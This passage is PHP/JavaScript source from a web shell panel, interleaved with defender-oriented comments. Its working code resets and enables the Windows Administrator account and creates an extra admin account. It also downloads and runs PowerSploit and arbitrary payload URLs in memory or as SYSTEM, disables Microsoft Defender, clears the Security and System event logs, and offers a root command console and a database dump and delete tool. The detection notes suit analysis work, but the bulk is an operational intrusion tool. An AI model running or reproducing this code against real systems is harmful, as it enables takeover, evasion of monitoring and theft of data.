if(@file_put_contents('.htaccess', $ht)) echo "<div class='text-accent' style='margin-top:10px;'>.htaccess deployed! Use .root extension for PHP.</div>";
endif; ?>
</form>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-microchip text-primary"></i> 4. FastCGI / PHP-FPM Evasion</h3>
<p style="font-size: 13px; color: var(--text-dim); margin-bottom: 15px;">Attempt to bypass restrictions by targeting PHP-FPM sockets.</p>
<button class="btn" onclick="alert('Module: PHP-FPM socket exploit for RCE bypass.')">AUTO EXPLOIT</button>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-user-secret text-primary"></i> 3. Stealth Loader (LD_PRELOAD placeholder)</h3>
<p style="margin-bottom: 15px; font-size: 13px; color: var(--text-dim);">Advanced bypass using shared object injection.</p>
<button class="btn" onclick="alert('Module planned: SO injection for disable_functions bypass.')">DEPLOY MODULE</button>
</div>
<?php elseif(isset($_GET['settings'])): ?>
<div class="title-section">
<h1>SHELL <span>SETTINGS</span></h1>
<p style="color: var(--text-dim);">Configuration and Access Control</p>
</div>
<div class="card" style="max-width: 600px;">
<h3 style="margin-bottom: 25px;"><i class="fas fa-lock text-primary"></i> Access Protection</h3>
<form id="settings-form">
<div style="margin-bottom: 20px;">
<label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">LOGIN PROTECTION</label>
<select id="login_enable" name="login_enable" style="background: rgba(255,255,255,0.05); border: 1px solid var(--border); color: #fff; padding: 10px; border-radius: 6px; width: 100%;">
<option value="1" <?= $pagePasswordEnable === '1' ? 'selected' : '' ?>>ENABLED</option>
<option value="0" <?= $pagePasswordEnable === '0' ? 'selected' : '' ?>>DISABLED (OPEN)</option>
</select>
</div>
<div style="display: grid; grid-template-columns: 1fr 1fr; gap: 20px; margin-bottom: 25px;">
<div>
<label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">USERNAME</label>
<input type="text" id="login_user" value="<?= htmlspecialchars($username) ?>">
</div>
<div>
<label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">PASSWORD</label>
<input type="text" id="login_pass" value="<?= htmlspecialchars($password) ?>">
</div>
</div>
<h3 style="margin-bottom: 15px; color: #24A1DE;"><i class="fab fa-telegram-plane"></i> Telegram Notifications</h3>
<div style="display: grid; grid-template-columns: 1fr 1fr; gap: 20px; margin-bottom: 25px;">
<div>
<label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">BOT TOKEN</label>
<input type="text" id="tg_token" value="<?= htmlspecialchars($telegram_token) ?>" placeholder="123456:ABC-DEF...">
</div>
<div>
<label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">CHAT ID</label>
<input type="text" id="tg_chatid" value="<?= htmlspecialchars($telegram_chatid) ?>" placeholder="123456789">
</div>
</div>
<button type="button" class="btn btn-primary" style="width: 100%; justify-content: center;" onclick="saveSettings()">
<i class="fas fa-save"></i> SAVE CONFIGURATION
</button>
</form>
</div>
<script>
// Collects the access-control and notification fields from the settings form
// and POSTs them to this script's "?ajax" endpoint with save_settings=1.
// The server-side handler is not visible in this part of the file, so how and
// where the values are stored cannot be stated from here.
// Defender note: the form shows the current username, password, bot token and
// chat id in plain text inputs, so a recovered copy of the file or page may
// contain operator credentials and a Telegram bot token. Those are leads for
// attribution, and for checking proxy or DNS logs for outbound traffic from the
// web server to the Telegram bot API (presumed destination - confirm against
// the handler).
function saveSettings() {
const enable = document.getElementById('login_enable').value;
const user = document.getElementById('login_user').value;
const pass = document.getElementById('login_pass').value;
const tg_token = document.getElementById('tg_token').value;
const tg_chatid = document.getElementById('tg_chatid').value;
const fd = new FormData();
fd.append('save_settings', '1');
fd.append('login_enable', enable);
fd.append('login_user', user);
fd.append('login_pass', pass);
fd.append('tg_token', tg_token);
fd.append('tg_chatid', tg_chatid);
// Response is expected to be JSON with "status" and "message"; the page reloads on success.
fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => {
alert(data.message); if(data.status === 'success') window.location.reload();
});
}
</script>
<?php elseif(isset($_GET['db'])): ?>
<div class="title-section">
<h1>DATABASE <span>MANAGER</span></h1>
<p style="color: var(--text-dim);">Internal MySQLi Administration Tool</p>
</div>
<div class="card" id="db-login-form">
<div style="display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 15px; margin-bottom: 20px;">
<div>
<label style="display: block; font-size: 10px; color: var(--accent); margin-bottom: 5px;">HOST</label>
<input type="text" id="db_host" value="<?= htmlspecialchars($_GET['h'] ?? 'localhost') ?>">
</div>
<div>
<label style="display: block; font-size: 10px; color: var(--accent); margin-bottom: 5px;">USER</label>
<input type="text" id="db_user" value="<?= htmlspecialchars($_GET['u'] ?? '') ?>" placeholder="root">
</div>
<div>
<label style="display: block; font-size: 10px; color: var(--accent); margin-bottom: 5px;">PASSWORD</label>
<input type="text" id="db_pass" value="<?= htmlspecialchars($_GET['p'] ?? '') ?>" placeholder="Password">
</div>
<div>
<label style="display: block; font-size: 10px; color: var(--accent); margin-bottom: 5px;">DATABASE</label>
<input type="text" id="db_name" value="<?= htmlspecialchars($_GET['d'] ?? '') ?>" placeholder="Database Name">
</div>
</div>
<button class="btn btn-primary" onclick="dbConnect()" style="width: 100%; justify-content: center;">
<i class="fas fa-plug"></i> CONNECT TO DATABASE
</button>
</div>
<div id="db-workspace" class="hidden">
<div style="display: grid; grid-template-columns: 250px 1fr; gap: 20px;">
<div class="card" style="padding: 15px; max-height: 700px; overflow-y: auto;">
<h4 style="margin-bottom: 10px; font-size: 12px; color: var(--accent); display: flex; justify-content: space-between;">
TABLES <i class="fas fa-sync-alt" style="cursor: pointer" onclick="loadTables()"></i>
</h4>
<input type="text" id="table-filter" placeholder="Search tables..." style="font-size: 10px; padding: 6px; margin-bottom: 10px; width: 100%;" onkeyup="filterTables()">
<div id="db-tables-list" style="display: flex; flex-direction: column; gap: 5px;"></div>
</div>
<div>
<div class="card" style="margin-bottom: 20px; background: rgba(0, 112, 243, 0.02); border-color: rgba(0, 112, 243, 0.1);">
<h4 style="margin-bottom: 10px; font-size: 12px;">SQL CONSOLE</h4>
<textarea id="db_sql" style="height: 120px; font-family: 'JetBrains Mono', monospace; margin-bottom: 15px; background: #000; border: 1px solid #222; color: #0f0;" placeholder="SELECT * FROM wp_users LIMIT 10;"></textarea>
<div style="display: flex; gap: 10px;">
<button class="btn btn-primary" onclick="dbExecute()">RUN QUERY</button>
<button class="btn" onclick="document.getElementById('db_sql').value = 'SHOW TABLES'">SHOW TABLES</button>
<button class="btn" style="background: #fb8500; color: #fff;" onclick="dbExport()"><i class="fas fa-file-export"></i> DUMP DB</button>
<button class="btn btn-danger" onclick="location.reload()" style="margin-left: auto;">DISCONNECT</button>
</div>
</div>
<div id="db-results-container" class="card hidden" style="padding: 0; overflow: auto; max-height: 500px; background: #050505;">
<div id="db-results-meta" style="padding: 10px; font-size: 10px; color: var(--text-muted); border-bottom: 1px solid var(--border);"></div>
<table class="data-table" id="db-results-table"></table>
</div>
</div>
</div>
</div>
<script>
// "Connect" is only a table listing: no connection state is kept in the browser,
// and every later request re-sends the credentials from the form fields.
function dbConnect() {
loadTables();
}
// Requests the table list for the database named in the form and builds the
// sidebar from the response.
// The host, user, password and database name are sent as POST fields to "?ajax"
// with db_action=list_tables; the handler is outside this part of the file.
// Defender note: where request bodies are logged or inspected, POSTs to this
// script carrying a db_action field are a direct indicator of database access
// through the shell. Treat any credentials reachable on the host (for example
// in application config files) as exposed and rotate them.
function loadTables() {
const fd = new FormData();
fd.append('db_action', 'list_tables');
fd.append('db_host', document.getElementById('db_host').value);
fd.append('db_user', document.getElementById('db_user').value);
fd.append('db_pass', document.getElementById('db_pass').value);
fd.append('db_name', document.getElementById('db_name').value);
fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => {
if(data.status === 'success') {
document.getElementById('db-login-form').classList.add('hidden');
document.getElementById('db-workspace').classList.remove('hidden');
// Optional field in the response: shown as a detected "WPS Hide Login" path.
// Presumably the handler reads the custom login slug from the database - confirm there.
if (data.wp_info && data.wp_info.whl) {
document.getElementById('db-results-container').classList.remove('hidden');
document.getElementById('db-results-meta').innerHTML = `<span style='color: #ff9800; font-weight: bold;'><i class='fas fa-mask'></i> [DETECTED] WPS Hide Login: /${htmlspecialchars(data.wp_info.whl)}</span>`;
}
const list = document.getElementById('db-tables-list');
list.innerHTML = '';
// One clickable entry per table; table names are inserted into the markup as returned.
data.tables.forEach(t => {
const btn = document.createElement('div');
btn.className = 'badge-system';
btn.style.cursor = 'pointer';
btn.style.textAlign = 'left';
btn.style.padding = '8px';
btn.innerHTML = `<i class="fas fa-table text-accent"></i> ${t}`;
// Clicking an entry fills the console with a 50-row SELECT and runs it.
btn.onclick = () => {
document.getElementById('db_sql').value = `SELECT * FROM \`${t}\` LIMIT 50;`;
dbExecute();
};
list.appendChild(btn);
});
} else {
alert(data.message);
}
});
}
// Sends a SQL statement (the argument, or the console textarea when no argument
// is given) to "?ajax" with db_action=query and renders the returned rows as a
// table with a per-row delete button.
// Defender note: the statement is free text, so the scope of access is whatever
// the supplied database account is allowed to do. For incident scoping, review
// database audit or general query logs for the account(s) found in application
// config files on this host, and assume table contents readable by those
// accounts were disclosed.
function dbExecute(customSql = null) {
const sql = customSql || document.getElementById('db_sql').value;
if(!sql) return;
const container = document.getElementById('db-results-container');
const table = document.getElementById('db-results-table');
const meta = document.getElementById('db-results-meta');
const fd = new FormData();
fd.append('db_action', 'query');
fd.append('db_host', document.getElementById('db_host').value);
fd.append('db_user', document.getElementById('db_user').value);
fd.append('db_pass', document.getElementById('db_pass').value);
fd.append('db_name', document.getElementById('db_name').value);
fd.append('sql', sql);
fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => {
container.classList.remove('hidden');
if(data.status === 'success') {
if(data.data) {
// Table name is guessed from the first FROM clause of the statement text; empty when none matches.
data.table_name = sql.match(/FROM\s+[`"]?(\w+)[`"]?/i)?.[1] || '';
meta.innerHTML = `Showing ${data.count} results.`;
let html = '<thead><tr>';
if(data.data.length > 0) {
// Header cells come from the keys of the first row.
Object.keys(data.data[0]).forEach(k => html += `<th>${k}</th>`);
html += '<th>ACTIONS</th>';
html += '</tr></thead><tbody>';
data.data.forEach(row => {
html += '<tr>';
// The first column of each row is used as the key for the delete button.
let firstCol = Object.keys(row)[0];
let firstVal = Object.values(row)[0];
// String values longer than 100 characters are truncated for display.
Object.values(row).forEach(v => html += `<td>${v === null ? '<em>NULL</em>' : (typeof v === 'string' && v.length > 100 ? htmlspecialchars(v.substring(0, 100)) + '...' : htmlspecialchars(v))}</td>`);
html += `<td><button class='btn btn-sm btn-danger' onclick="dbDeleteRow('${data.table_name}', '${firstCol}', '${firstVal}')"><i class='fas fa-trash'></i></button></td>`;
html += '</tr>';
});
} else {
html += '<th>Result</th></tr></thead><tbody><tr><td>No data found.</td></tr>';
}
html += '</tbody>';
table.innerHTML = html;
} else {
// Statements without a row set: only the server's message is shown.
meta.innerHTML = data.message;
table.innerHTML = '';
}
} else {
alert(data.message);
}
});
}
// Asks the server side to dump the selected database (db_action=export_sql) and
// then navigates to the shell's file view ("?p=" with the encoded PATH value).
// The confirm() text is Turkish: "This operation will save the database as SQL
// on the server. Are you sure?" - i.e. the dump is written to the server's disk.
// Where it is written is decided by the handler, which is not visible here.
// Defender note: during cleanup, search web-reachable directories for
// unexpected SQL dump files and check access logs for downloads of them; a dump
// left in the web root is a second disclosure path independent of the shell.
function dbExport() {
if(!confirm('Bu işlem veritabanını SQL olarak sunucuya kaydedecek. Emin misiniz?')) return;
const fd = new FormData();
fd.append('db_action', 'export_sql');
fd.append('db_host', document.getElementById('db_host').value);
fd.append('db_user', document.getElementById('db_user').value);
fd.append('db_pass', document.getElementById('db_pass').value);
fd.append('db_name', document.getElementById('db_name').value);
fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => {
alert(data.message);
if(data.status === 'success') window.location.href = '?p=<?= encodePath(PATH) ?>';
});
}
// Deletes one row: sends db_action=delete_row with the table name and a WHERE
// clause assembled in the browser from the row's first column and value.
// The confirm() text is Turkish: "Are you sure you want to delete the row?"
// Defender note: this is a destructive write path. When scoping an incident,
// compare affected tables against backups rather than assuming read-only access.
function dbDeleteRow(table, col, val) {
if(!confirm('Satırı silmek istediğinize emin misiniz?')) return;
const fd = new FormData();
fd.append('db_action', 'delete_row');
fd.append('db_host', document.getElementById('db_host').value);
fd.append('db_user', document.getElementById('db_user').value);
fd.append('db_pass', document.getElementById('db_pass').value);
fd.append('db_name', document.getElementById('db_name').value);
fd.append('table', table);
fd.append('where', `${col} = '${val}'`);
// The result view is refreshed after a successful delete.
fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => {
alert(data.message);
if(data.status === 'success') dbExecute();
});
}
// Client-side escaping helper used when rendering query results; non-string
// values are returned unchanged.
// NOTE(review): in this copy the replacement map shows each character mapped to
// itself, which looks like the HTML entities were decoded when the listing was
// captured. Treat this listing as non-verbatim when deriving byte-level
// signatures from it.
function htmlspecialchars(str) {
if (typeof str !== 'string') return str;
return str.replace(/[&<>"']/g, function(m) {
return {'&': '&', '<': '<', '>': '>', '"': '"', "'": '''}[m];
});
}
// Case-insensitive substring filter over the sidebar table list; it only
// toggles the display of existing entries and makes no request.
function filterTables() {
const val = document.getElementById('table-filter').value.toLowerCase();
const items = document.querySelectorAll('#db-tables-list div');
items.forEach(it => {
it.style.display = it.innerText.toLowerCase().includes(val) ? 'block' : 'none';
});
}
// Auto-connect: when the page URL carries db, h and u parameters, the table
// listing is requested immediately on load. The form fields above are
// pre-filled from the h, u, p and d query parameters.
// Defender note: because those values travel in the query string, web-server
// access logs for this script may contain the database host, user and password
// the operator used. That helps scoping, and is a reason to restrict access to
// those logs and rotate the credentials.
window.onload = function() {
const urlParams = new URLSearchParams(window.location.search);
if (urlParams.has('db') && urlParams.has('h') && urlParams.has('u')) {
dbConnect();
}
}
</script>
<?php elseif(isset($_GET['winr00t'])): ?>
<div class="title-section">
<h1>WINDOWS <span>ROOT</span></h1>
<p style="color: var(--text-dim);">Ultra Admin Creator Bypass (Windows/2025)</p>
</div>
<div class="card">
<form method="post">
<div style="display: flex; gap: 10px; align-items: center; flex-wrap: wrap; margin-bottom: 20px;">
<div style="flex: 1; min-width: 200px;">
<label style="display: block; font-size: 11px; margin-bottom: 5px; color: var(--primary);">ADMIN USERNAME</label>
<input type="text" name="win_user" value="<?= htmlspecialchars($_POST['win_user'] ?? 'root_adm') ?>">
</div>
<div style="flex: 1; min-width: 200px;">
<label style="display: block; font-size: 11px; margin-bottom: 5px; color: var(--primary);">ADMIN PASSWORD</label>
<?php $rand_pw = substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, 12); ?>
<input type="text" name="win_pass" value="<?= htmlspecialchars($_POST['win_pass'] ?? $rand_pw) ?>">
</div>
<button type="submit" name="do_winroot" class="btn btn-primary" style="margin-top: 18px;">
<i class="fas fa-user-plus"></i> INJECT ADMIN
</button>
</div>
</form>
<?php
// Reports the RDP listening port of the host.
// First reads the PortNumber value under the RDP-Tcp registry key and converts
// the hex DWORD to decimal; if that does not match, it falls back to checking
// netstat output for ":3389". Returns an int port or the string 'Unknown'.
// root_exec() is defined elsewhere in the file; it is assumed to run the command
// and return its output - confirm there.
// Defender note: this runs on every render of the ?winr00t view, so a web-server
// worker process spawning reg.exe and netstat is a behavioural indicator.
function detect_rdp_port() {
$reg = root_exec('reg query "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp" /v PortNumber 2>&1');
if (preg_match('/PortNumber\s+REG_DWORD\s+0x([0-9a-f]+)/i', $reg, $m)) return hexdec($m[1]);
$netstat = root_exec('netstat -an | find ":3389"');
if (strpos($netstat, '3389') !== false) return 3389;
return 'Unknown';
}
// Queries Microsoft Defender's real-time protection state through PowerShell
// (Get-MpComputerStatus) and returns an HTML badge: ENABLED, DISABLED, or N/A
// when the output is neither 'True' nor 'False'.
// Read-only check; it changes nothing. Note the colour classes are inverted from
// a defender's point of view: protection being on is styled as "status-off".
// Defender note: powershell.exe started by the web-server worker is itself worth
// alerting on, independent of the command it runs.
function detect_defender_status() {
$res = root_exec('powershell -Command "(Get-MpComputerStatus).RealTimeProtectionEnabled"');
if (trim($res) === 'True') return '<span class="status-off" style="padding: 2px 8px; border-radius: 4px; background: rgba(255, 62, 62, 0.2); color: #ff3e3e; font-weight: bold;">ENABLED</span>';
if (trim($res) === 'False') return '<span class="status-on" style="padding: 2px 8px; border-radius: 4px; background: rgba(0, 180, 216, 0.2); color: #00b4d8; font-weight: bold;">DISABLED</span>';
return '<span style="color: grey;">N/A</span>';
}
// Status panel for the Windows view. These statements run on every page render,
// not only on form submission, so simply opening ?winr00t starts several child
// processes (reg, netstat, powershell, whoami).
$rdp_port = detect_rdp_port();
$def_status = detect_defender_status();
$privs = root_exec('whoami /priv');
// "Ready" is a text heuristic: the privilege name and the word "Enabled" both
// appear somewhere in the whoami /priv output (not necessarily on the same line).
// Defender note: the "SYSTEM (Virtual)" label below is a fixed string printed
// when that heuristic is true; nothing in these lines performs an elevation, so
// the panel is not evidence of the level of access actually obtained.
// Hardening: run the web application pool under an account without
// SeImpersonatePrivilege where the platform allows it.
$is_god = (stripos($privs, 'SeImpersonatePrivilege') !== false && stripos($privs, 'Enabled') !== false);
echo "<div style='display: flex; gap: 15px; margin-bottom: 20px; flex-wrap: wrap;'>";
echo "<div class='badge-system' style='padding:10px; flex: 1; border: 1px solid #333;'>Defender: $def_status</div>";
echo "<div class='badge-system' style='padding:10px; flex: 1; border: 1px solid #333;'>Status: " . ($is_god ? '<span style="color:#0f0; font-weight:bold;">GOD MODE (READY)</span>' : '<span style="color:#777;">Limited</span>') . "</div>";
echo "<div class='badge-system' style='padding:10px; flex: 1; border: 1px solid #333;'>Effective User: <span class='text-primary'>" . ($is_god ? "SYSTEM (Virtual)" : root_exec('whoami')) . "</span></div>";
echo "<div class='badge-system' style='padding:10px; flex: 1; border: 1px solid #333;'>RDP Port: <span class='text-accent'>$rdp_port</span></div>";
echo "</div>";
// Handler for the "INJECT ADMIN" form: resets and enables the built-in
// Administrator account and creates an additional local account, adding both to
// the local administrators group. The group name is resolved from the
// well-known SID S-1-5-32-544 so it works on localised systems.
// wout() and root_exec_system() are defined elsewhere in the file; presumably
// they print a log line and run a command with elevated rights - confirm there.
// Whether the commands succeed depends on the rights of that execution path.
// Detection (Windows Security log): 4720 (account created), 4722 (account
// enabled), 4724 (password reset attempt), 4732 (member added to a local
// security group); also net.exe / net1.exe with a web-server worker as parent.
// The form's default account name is 'root_adm' (operator-editable).
// Response: audit local administrators membership, disable unknown accounts,
// reset the built-in Administrator password and review RDP logons
// (event 4624, logon type 10) after the file's creation time.
if (isset($_POST['do_winroot'])) {
// The username is restricted to letters, digits, underscore and hyphen; the password is used as submitted.
$u = preg_replace('/[^a-zA-Z0-9_\-]/','',$_POST['win_user']);
$p = $_POST['win_pass'];
echo '<pre style="background: #000; color: #0f0; padding: 20px; border-radius: 8px; font-family: monospace; font-size: 12px; max-height: 400px; overflow: auto; border: 1px solid #333;">';
wout("[*] Detecting system architecture...");
// $arch is only logged; it is not used by the commands below.
$arch = (strpos(php_uname('m'), '64') !== false) ? 'x64' : 'x86';
wout("[+] Architecture: $arch");
wout("[*] Finding Administrators group name...");
$admins_group_res = trim(root_exec('powershell -Command "(New-Object System.Security.Principal.SecurityIdentifier(\'S-1-5-32-544\')).Translate([System.Security.Principal.NTAccount]).Value"'));
// Keeps the part after the last backslash (e.g. the group name without the BUILTIN prefix); falls back to the English name.
$admins_group = $admins_group_res ? end(explode('\\', $admins_group_res)) : "Administrators";
$injection_cmds = [
"net user Administrator \"$p\" /active:yes",
"net user Administrator \"$p\"",
"net localgroup \"$admins_group\" Administrator /add",
"net user \"$u\" \"$p\" /add /y",
"net localgroup \"$admins_group\" \"$u\" /add"
];
// Each command is echoed (HTML-escaped) and run; results are not checked, so the
// closing message below is printed regardless of success.
foreach ($injection_cmds as $cmd) {
wout(" [*] Executing: " . htmlspecialchars($cmd));
root_exec_system($cmd);
}
wout("[FINISH] Exploit sequence completed. Check RDP access.");
echo '</pre>';
}
?>
</div>
<div class="card" style="margin-top: 20px;">
<h3 style="margin-bottom: 20px;"><i class="fas fa-search-plus text-primary"></i> PowerUp Privesc Scanner</h3>
<p style="margin-bottom: 15px; font-size: 13px; color: var(--text-dim);">Running PowerUp.ps1 to identify privilege escalation vectors. This will download the latest script and execute 'Invoke-AllChecks'.</p>
<form method="post">
<button type="submit" name="run_powerup" class="btn btn-primary"><i class="fas fa-play"></i> RUN POWERUP ANALYSIS</button>
</form>
<?php if (isset($_POST['run_powerup'])):
// Handler for the "RUN POWERUP ANALYSIS" button: has PowerShell download a
// script from a public GitHub raw URL, evaluate it in memory and run its
// Invoke-AllChecks function, then prints the HTML-escaped output.
// Nothing is written to disk by these lines; the script body exists only in the
// PowerShell process.
// Detection: PowerShell script block logging (event 4104) and AMSI see the
// downloaded content even though it never touches disk; process telemetry shows
// powershell.exe with hidden-window and execution-policy-bypass switches under a
// web-server parent; proxy or DNS logs show the web server fetching from
// raw.githubusercontent.com.
// Mitigation: deny general outbound HTTP(S) from the web tier and apply
// Constrained Language Mode or application control to the service account.
echo '<pre style="margin-top: 20px; background: #000; color: #0f0; padding: 20px; border-radius: 8px; font-family: monospace; font-size: 11px; max-height: 600px; overflow: auto; border: 1px solid #333;">';
$url = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1";
$ps_cmd = "Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; IEX ((New-Object System.Net.WebClient).DownloadString('$url')); Invoke-AllChecks";
echo htmlspecialchars(root_exec("powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"$ps_cmd\" 2>&1"));
echo '</pre>';
endif; ?>
</div>
<div class="card" style="border: 1px solid var(--primary); background: rgba(255, 62, 62, 0.05); margin-top: 20px;">
<h4 style="margin-bottom: 15px;"><i class="fas fa-shield-virus text-primary"></i> Security Annihilation (AV KILLER)</h4>
<div style="display: flex; gap: 10px;">
<form method="post" style="flex: 1;"><button type="submit" name="fast_kill_av" class="btn btn-primary" style="width: 100%; justify-content: center;"><i class="fas fa-bolt"></i> FAST DISABLE</button></form>
<form method="post" style="flex: 1;"><button type="submit" name="ghost_nuke_av" class="btn" style="width: 100%; justify-content: center; background: #fb8500; color: #fff;"><i class="fas fa-ghost"></i> GHOST NUKE</button></form>
</div>
<?php
// Handler for the "FAST DISABLE" button: asks Defender to turn off real-time
// monitoring and tries to stop the WinDefend service. Results are not checked;
// the final line is printed whether or not either command had any effect.
// The neighbouring "GHOST NUKE" button (ghost_nuke_av) has no handler in this
// part of the file.
// Detection: Microsoft Defender operational log event 5001 (real-time
// protection disabled) and 5007 (configuration changed); service state changes
// in the System log; sc.exe / powershell.exe under a web-server parent.
// Mitigation: with Tamper Protection enabled, Defender rejects this kind of
// preference change; forward Defender events off-host so that the alert
// survives local tampering.
if (isset($_POST['fast_kill_av'])) {
echo '<pre style="margin-top: 15px; background: #000; color: #f44; padding: 15px; border: 1px solid #300;">';
$nuke_cmds = ["powershell -Command \"Set-MpPreference -DisableRealtimeMonitoring \$true -Force\"", "sc stop WinDefend"];
foreach($nuke_cmds as $c) { echo "[*] Executing: $c...\n"; root_exec_system($c); }
echo "[+] SECURITY CRIPPLED.\n</pre>";
}
?>
</div>
<div class="card" style="margin-top: 20px;">
<h4 style="margin-bottom: 15px;"><i class="fas fa-microchip text-primary"></i> Advanced Remote Stager (EXE / PS / IEX)</h4>
<form method="post">
<input type="text" name="stager_url" placeholder="Direct URL to payload (e.g. .ps1, .exe, .bat)" style="margin-bottom: 10px;">
<div style="display: flex; gap: 10px;">
<button type="submit" name="run_stager_ps" class="btn btn-primary" style="flex: 1;"><i class="fas fa-code"></i> PS IEX</button>
<button type="submit" name="run_stager_exe" class="btn" style="flex: 1; border: 1px solid var(--primary);"><i class="fas fa-file-exe"></i> DOWNLOAD & EXEC</button>
</div>
</form>
<?php
// Handler for the "PS IEX" button: passes an operator-supplied URL to PowerShell,
// which downloads the content as a string and evaluates it in memory.
// The URL is echoed into the page and placed in the command line as submitted.
// Detection: same family as any download-and-evaluate cradle - script block
// logging (4104) and AMSI capture the evaluated content; look for powershell.exe
// with hidden-window / bypass switches under the web-server worker and for
// outbound requests from the web tier to hosts it has no business contacting.
if (isset($_POST['run_stager_ps'])) {
$url = $_POST['stager_url'];
echo '<pre style="margin-top: 15px; background: #000;">';
echo "[*] Triggering IEX: $url\n";
$cmd = "powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"IEX (New-Object Net.WebClient).DownloadString('$url')\"";
root_exec_system($cmd);
// Printed unconditionally; it does not indicate that the command ran.
echo "[+] Execution command sent.\n</pre>";
}
// Handler for the "DOWNLOAD & EXEC" button: downloads an operator-supplied URL
// to C:\Windows\Temp under a generated name and, if the file exists afterwards,
// starts it through root_exec_system() (defined elsewhere).
// File-name pattern from this code: "srv_" + three digits (100-999) + ".exe".
// Detection and hunting: files matching C:\Windows\Temp\srv_NNN.exe, process
// creation from that path, and a PowerShell WebClient download by the web
// service account. Any such file found should be preserved for analysis before
// removal; hash it and search the estate for the same hash.
// Mitigation: application control that blocks execution from Temp directories.
if (isset($_POST['run_stager_exe'])) {
$url = $_POST['stager_url'];
$name = "srv_" . rand(100, 999) . ".exe";
echo '<pre style="margin-top: 15px; background: #000;">';
echo "[*] Downloading: $url to C:\\Windows\\Temp\\$name\n";
$ps = "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object Net.WebClient).DownloadFile('$url', 'C:\\Windows\\Temp\\$name')";
root_exec("powershell -Command \"$ps\"");
// The only success check in this handler: the file must exist before it is launched.
if (file_exists("C:\\Windows\\Temp\\$name")) {
echo "[+] Downloaded. Launching as SYSTEM...\n";
root_exec_system("C:\\Windows\\Temp\\$name");
} else {
echo "[!] Download failed.\n";
}
echo "</pre>";
}
?>
</div>
<div class="card" style="border: 1px solid #ffd60a; background: rgba(255, 214, 10, 0.05); margin-top: 20px;">
<h4 style="margin-bottom: 15px;"><i class="fas fa-user-ninja text-accent"></i> ELITE BYPASS TOOLS (v2025)</h4>
<div style="display: grid; grid-template-columns: 1fr 1fr; gap: 10px;">
<form method="post"><button type="submit" name="bypass_uac" class="btn btn-sm" style="width: 100%; justify-content: center;"><i class="fas fa-user-shield"></i> FODHELPER UAC BYPASS</button></form>
<form method="post"><button type="submit" name="clear_logs" class="btn btn-sm" style="width: 100%; justify-content: center;"><i class="fas fa-eraser"></i> CLEAR EVENT LOGS</button></form>
</div>
<?php
// Handler for the "CLEAR EVENT LOGS" button: clears the System, Setup and
// Security event logs in that order (chained with &&, so a failure stops the
// chain before the later logs). "CLEANED" is printed regardless of the outcome.
// The neighbouring "FODHELPER UAC BYPASS" button (bypass_uac) has no handler in
// this part of the file.
// Detection: clearing is itself logged - Security event 1102 (audit log
// cleared) and System event 104 (log cleared) - and wevtutil.exe under a
// web-server parent is anomalous.
// Mitigation: forward events to a collector in near real time so that local
// clearing does not remove the record; treat a gap or a 1102 on a web server as
// a high-severity alert.
if (isset($_POST['clear_logs'])) {
echo '<pre style="margin-top: 10px; background:#000;">[*] Purging system logs...\n';
root_exec_system("wevtutil cl System && wevtutil cl Setup && wevtutil cl Security");
echo "[+] CLEANED.</pre>";
}
?>
</div>
<br>
<?php elseif(isset($_GET['linr00t'])): ?>
<div class="title-section">
<h1>LINUX <span>MARAZ</span></h1>
<p style="color: var(--text-dim);">Kernel Privilege Escalation & System Analysis</p>
</div>
<div style="display: grid; grid-template-columns: 1fr 350px; gap: 25px;">
<div class="left-col">
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-search text-primary"></i> System Diagnostics</h3>
<div style="display: grid; grid-template-columns: 1fr 1fr; gap: 15px;">
<div class="info-item"><span class="info-label">Kernel:</span> <span class="info-value"><?= root_exec('uname -r') ?></span></div>
<div class="info-item"><span class="info-label">Architecture:</span> <span class="info-value"><?= root_exec('uname -m') ?></span></div>
<div class="info-item"><span class="info-label">Distribution:</span> <span class="info-value"><?= root_exec('cat /etc/issue | head -n 1') ?></span></div>
<div class="info-item"><span class="info-label">GLIBC:</span> <span class="info-value"><?= root_exec('ldd --version | head -n 1') ?></span></div>
<div class="info-item"><span class="info-label">Uptime:</span> <span class="info-value"><?= root_exec('uptime -p') ?></span></div>
<div class="info-item"><span class="info-label">Current User:</span> <span class="info-value text-accent"><?= root_exec('id') ?></span></div>
</div>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-terminal text-primary"></i> Root Console</h3>
<form method="post">
<div style="display: flex; gap: 10px;">
<input type="text" name="lin_cmd" value="<?= htmlspecialchars($_POST['lin_cmd'] ?? 'id; whoami') ?>" placeholder="Enter command to run as root...">
<button type="submit" name="run_lin_cmd" class="btn btn-primary">EXECUTE</button>
</div>
</form>
<?php if (isset($_POST['run_lin_cmd'])): ?>
<pre style="margin-top: 15px; background: #000; color: #0f0; padding: 15px; border-radius: 8px; font-family: monospace; border: 1px solid #333;"><?= htmlspecialchars(root_exec($_POST['lin_cmd'])) ?></pre>
<?php endif; ?>
</div>
<div class="card">
<h3 style="margin-bottom: 20px;"><i class="fas fa-shield-alt text-primary"></i> SUID Binary Search</h3>
